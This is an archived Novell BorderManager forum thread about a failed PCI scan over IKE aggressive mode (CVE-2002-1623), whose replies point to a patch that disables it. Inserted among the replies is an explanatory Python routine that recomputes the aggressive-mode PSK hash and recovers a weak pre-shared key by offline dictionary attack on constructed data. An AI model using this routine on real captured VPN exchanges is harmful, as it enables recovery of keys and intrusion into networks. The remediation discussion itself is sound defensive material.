NMAS, NDS, VPN and PCI compliance

Long story short, our last PCI compliance scan came back with a failed
item. We're using BM 3.9sp2. VPN is using NMAS authentication, NDS
sequence for Client-to-site VPN.

The failed item references CVE-2002-1623 in regard to aggressive mode
IKE and suggests we set the mode to normal -or- appeal the finding.
Their words are, "If you already have a strong password policy for the
PSKs, then you can appeal this vulnerability."

So I guess my questions are

1) can the IKE mode be changed? I've looked in iManager and don't see
anything obvious.

2) I don't see any settings for managing PSKs for client-to-site VPN
settings. What/where are the Pre-shared keys for client-to-site VPN? Are
they even used for client-to-site? 

3) Would anyone have any experiences they'd like to share in dealing
with these PCI issues?

Any hints or suggestions would be much appreciated!
Thanks!
~Daniel

Here is verbatim scan description and remediation text:

description:
The remote host is a VPN concentrator that supports Aggressive mode
IKE. By creating a series of IKE aggressive mode proposals, and sending
those proposals to the VPN concentrator, an acceptable proposal for
Aggressive Mode IKE was discovered. In Aggressive Mode IKE, the response
from the VPN concentrator includes an authentication hash based on a
pre-shared key (PSK). This hash is not encrypted, so if it is captured
in transit, a dictionary or brute force attack against the hash can
potentially allow for the recovery of the PSK, and the exposure of
potentially sensitive information from VPN sessions. In rare cases where
the PSK is the sole means for authentication to the VPN, attackers can
use it to authenticate against the VPN and intrude into the network.

remediation:
The first option is to disable Aggressive Mode IKE for the VPN
Concentrator. Sometimes, the ability to disable Aggressive Mode IKE
isn't an option until later versions of the software, so ensure that the
VPN Concentrator is using the latest software version. If you are unable
to disable Aggressive Mode IKE, then you should ensure that the
pre-shared keys are strong. Like any password, be sure to use complex
PSK values, and rotate the keys as often as is practical. These are
recommended to be an alphanumeric value greater than 16 characters. If
you already have a strong password policy for the PSKs, then you can
appeal this vulnerability.

CVE Code:
CVE-2002-1623

Evidence (accepted aggressive-mode proposals):

Encryption   Hash   Auth Mode        DH Group
DES          MD5    Pre-Shared Key   Diffie-Hellman Group 1
DES          MD5    Pre-Shared Key   Diffie-Hellman Group 2
DES          MD5    RSA Signatures   Diffie-Hellman Group 1
DES          MD5    RSA Signatures   Diffie-Hellman Group 2
DES          SHA1   Pre-Shared Key   Diffie-Hellman Group 1
DES          SHA1   Pre-Shared Key   Diffie-Hellman Group 2
DES          SHA1   RSA Signatures   Diffie-Hellman Group 1
DES          SHA1   RSA Signatures   Diffie-Hellman Group 2
Triple-DES   MD5    Pre-Shared Key   Diffie-Hellman Group 1
Triple-DES   MD5    Pre-Shared Key   Diffie-Hellman Group 2
Triple-DES   MD5    RSA Signatures   Diffie-Hellman Group 1
Triple-DES   MD5    RSA Signatures   Diffie-Hellman Group 2
Triple-DES   SHA1   Pre-Shared Key   Diffie-Hellman Group 1
Triple-DES   SHA1   Pre-Shared Key   Diffie-Hellman Group 2
Triple-DES   SHA1   RSA Signatures   Diffie-Hellman Group 1
Triple-DES   SHA1   RSA Signatures   Diffie-Hellman Group 2


-- 
dshockle
------------------------------------------------------------------------

dshockle
12/15/2010 1:06:01 AM
novell.bordermanager.vpn

5 Replies

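The scan description above says that in aggressive mode the responder's authentication hash travels unencrypted and can be attacked offline. The Python below is an added illustration of the RFC 2409 arithmetic behind that claim; it is not from the thread, from the scanner, or from BorderManager. HASH_R is an HMAC keyed by SKEYID, and SKEYID is an HMAC of the two nonces keyed by the PSK, so every input except the PSK is visible on the wire (DH public values, ISAKMP cookies, the initiator's SA payload body, the responder's ID payload, both nonces). Whoever sees HASH_R can test PSK guesses without sending another packet to the gateway. All wire values, the wordlist and both PSKs are constructed test data; the field names are the RFC's, not BorderManager's.

```python
"""Added example, not from the thread or from BorderManager: the IKEv1
aggressive-mode PSK hash from RFC 2409 and an offline dictionary attack
against it.  All wire values, the wordlist and the PSKs are constructed."""
import hashlib
import hmac
import secrets

# The scan evidence lists MD5 and SHA1 as accepted IKE hash algorithms;
# RFC 2409 uses HMAC keyed with the negotiated hash as its prf.
PRF = {"MD5": hashlib.md5, "SHA1": hashlib.sha1}


def skeyid_psk(prf_name, psk, ni_b, nr_b):
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b) for PSK authentication.
    The PSK is the only input an observer does not see."""
    return hmac.new(psk, ni_b + nr_b, PRF[prf_name]).digest()


def hash_r(prf_name, psk, g_xr, g_xi, cky_r, cky_i, sai_b, idir_b, ni_b, nr_b):
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).
    In aggressive mode the responder sends this in the clear in message 2,
    before any keying material has been used to encrypt anything."""
    skeyid = skeyid_psk(prf_name, psk, ni_b, nr_b)
    msg = g_xr + g_xi + cky_r + cky_i + sai_b + idir_b
    return hmac.new(skeyid, msg, PRF[prf_name]).digest()


def crack_psk(prf_name, captured_hash_r, wire, wordlist):
    """Offline dictionary attack: recompute HASH_R for each candidate PSK
    from the values seen on the wire and compare against the capture.
    Returns the matching PSK or None; no further packets to the gateway."""
    for candidate in wordlist:
        guess = hash_r(prf_name, candidate.encode(), **wire)
        if hmac.compare_digest(guess, captured_hash_r):
            return candidate
    return None


def constructed_exchange():
    """Constructed stand-ins for the unencrypted fields of one aggressive
    mode exchange.  Real values would come from a capture or from the
    attacker's own probe, which is what the scanner did."""
    return {
        "g_xi": b"\x11" * 128,   # initiator DH public value (group 2 size)
        "g_xr": b"\x22" * 128,   # responder DH public value
        "cky_i": bytes(range(1, 9)),          # initiator ISAKMP cookie
        "cky_r": bytes(range(9, 17)),         # responder ISAKMP cookie
        "sai_b": b"\x00\x00\x00\x01" + b"\x00" * 40,   # initiator SA payload body
        "idir_b": b"\x01\x00\x00\x00" + bytes([192, 168, 1, 1]),  # ID_IPV4_ADDR
        "ni_b": b"\xaa" * 16,    # initiator nonce
        "nr_b": b"\xbb" * 16,    # responder nonce
    }


# Constructed wordlist standing in for the dictionary a cracker would use.
WORDLIST = ["password", "vpn123", "Summer2010", "bordermanager", "letmein"]


def demo(prf_name="SHA1"):
    """Run the attack twice: against a gateway using a weak PSK and against
    one using a long random PSK.  Returns the two crack results."""
    wire = constructed_exchange()
    # Weak PSK: HASH_R seen on the wire is enough to recover it offline.
    weak_hash = hash_r(prf_name, b"Summer2010", **wire)
    # Strong PSK (random, well over 16 chars): the search degrades to brute
    # force over the key space, which is why the scanner accepts a strong
    # PSK policy as a compensating control rather than a fix.
    strong_hash = hash_r(prf_name, secrets.token_urlsafe(24).encode(), **wire)
    return (crack_psk(prf_name, weak_hash, wire, WORDLIST),
            crack_psk(prf_name, strong_hash, wire, WORDLIST))


if __name__ == "__main__":
    for name in PRF:
        print(name, demo(name))
```

Two points worth taking from this when deciding between "fix" and "appeal". First, the attack works because aggressive mode puts HASH_R in the clear; in main mode the same hash is sent inside the encrypted fifth and sixth messages, so a passive observer never sees it, which is why disabling aggressive mode (the IR1 reply below) closes the finding rather than just raising its cost. Second, a long random PSK only makes the offline search infeasible; it does not stop the hash from leaking. Separately, the evidence table shows the gateway also accepting single DES, MD5 and DH group 1, which are weak regardless of mode and are worth tightening while you are in the VPN configuration anyway.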
On 15-12-2010 2:06, dshockle wrote:
>
> Long story short, our last PCI compliance scan came back with a failed
> item. We're using BM 3.9sp2. VPN is using NMAS authentication, NDS
> sequence for Client-to-site VPN.
>
> The failed item references CVE-2002-1623 in regard to aggressive mode
> IKE and suggests we set the mode to normal -or- appeal the finding.



Fixed in bm39sp2_ir1. Aggressive mode can be disabled after applying this
patch.

mysterious
12/15/2010 7:19:43 AM
Thank You for the reply!


-- 
dshockle
------------------------------------------------------------------------
dshockle's Profile: http://forums.novell.com/member.php?userid=38359
View this thread: http://forums.novell.com/showthread.php?t=428127

dshockle
12/15/2010 3:06:02 PM
On 15/12/10 16:06, dshockle wrote:
>
> Thank You for the reply!
>
>

You're welcome. Clarification: after applying bm39sp2_ir1, aggressive mode is
disabled by default.

Mysterious
12/15/2010 3:08:42 PM
for my own edification, where can I view this setting? I'm trying to
find documentation but not having much luck.



dshockle
12/15/2010 4:06:02 PM
On 15/12/10 17:06, dshockle wrote:
>
> for my own edification, where can I view this setting? I'm trying to
> find documentation but not having much luck.
>
>

monitor, server parameters, communication.
Mysterious
12/15/2010 4:08:09 PM